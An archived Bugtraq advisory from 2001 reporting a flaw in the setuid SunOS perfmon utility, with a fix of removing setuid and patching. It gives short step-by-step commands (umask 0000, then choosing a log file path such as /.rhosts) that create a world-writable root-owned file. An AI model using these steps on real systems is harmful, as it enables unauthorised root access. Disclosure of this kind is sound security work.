Bugtraq mailing list archives
[ Hackerslab bug_paper ] SunOS application perfmon vulnerability
From: ±è¿ëÁØ KimYongJun <s96192 () CE HANNAM AC KR>
Date: Fri, 23 Mar 2001 17:11:52 +0900
============================================================================== [ Hackerslab bug_paper ] SunOS application perfmon vulnerability ============================================================================== File : /opt/JSParm/bin/perfmon SYSTEM : Solaris 2.X INFO : parm is a program that displays system information . parm is SunOS application. It's not included in Solaris basic package. There is a vulneribility in perfmon program that you can create any file with root privilege as follow: $ whoami loveyou $ umask 0000 $ /opt/JSparm/bin/perfmon & Choose Logging -> Logging File In Selection part, input the file path you want to create ex:) /.rhosts following file is created in a second. -rw-rw-rw- 1 root loveyou 144 Mar 9 03:14 .rhost SOLUTION : remove setuid permition, contact your vendor and get a patch. ==-------------------------------------------------------------------------------== ******** * ** ** * * ** ** * * ****** * * ** ** * loveyou () hackerslab org * ** ** * [ http://www.hackerslab.org ] ******** HACKERSLAB (C) since 1999 ==-------------------------------------------------------------------------------==
Current thread:
- [ Hackerslab bug_paper ] SunOS application perfmon vulnerability ±è¿ëÁØ KimYongJun (Mar 23)